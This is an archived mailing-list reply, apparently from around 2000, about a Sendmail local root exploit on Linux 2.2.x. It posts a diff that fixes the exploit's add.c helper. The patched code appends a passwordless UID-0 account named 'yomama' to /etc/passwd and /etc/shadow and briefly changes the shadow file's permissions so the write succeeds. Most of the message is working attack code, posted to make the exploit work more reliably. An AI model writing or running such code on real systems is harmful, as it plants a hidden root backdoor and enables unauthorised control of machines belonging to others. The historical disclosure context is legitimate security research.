Re: Sendmail local root exploit on linux 2.2.x

[pettit () YAHOO-INC COM (Mark K. Pettit)]

> Hello all,
>
> Attached is a file with 2 sources, ex.c and add.c

This is a great exploit.  It is a little broken, though.  Here's a
patched version of the add.c script so that it is a little kinder and
works out of the box the first time.

The problem has to do with the permissions on the shadow file.  If it's
installed with mode 400, the exploit will fail.  There's also a \n left
out of the shadow line.

This patch fixes both of these problems.  Yah, I know it's trivial, but
I wanted to be complete.

============================================================================
--- add.c.orig  Thu Jun  8 11:32:33 2000
+++ add.c       Thu Jun  8 11:21:15 2000
@@ -1,17 +1,24 @@
 #include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>

 int main (void) {
    int fd;
    char string[40];
+   struct stat buf;

    seteuid(0);
    fd = open("/etc/passwd", O_APPEND|O_WRONLY);
    strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
    write(fd, string, strlen(string));
    close(fd);
+   stat("/etc/shadow", &buf);
+   chmod("/etc/shadow", S_IRUSR|S_IWUSR);
    fd = open("/etc/shadow", O_APPEND|O_WRONLY);
-   strcpy(string, "yomama::11029:0:99999:7:::");
+   strcpy(string, "yomama::11029:0:99999:7:::\n");
    write(fd, string, strlen(string));
    close(fd);
-
+   chmod("/etc/shadow", buf.st_mode);
 }
============================================================================


--
Mark K. Pettit, CCNA                Do you, uh, Yahoo!?
pettit () yahoo-inc com             Why, yes, I do, uh, Yahoo!
Technical Yahoo
Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051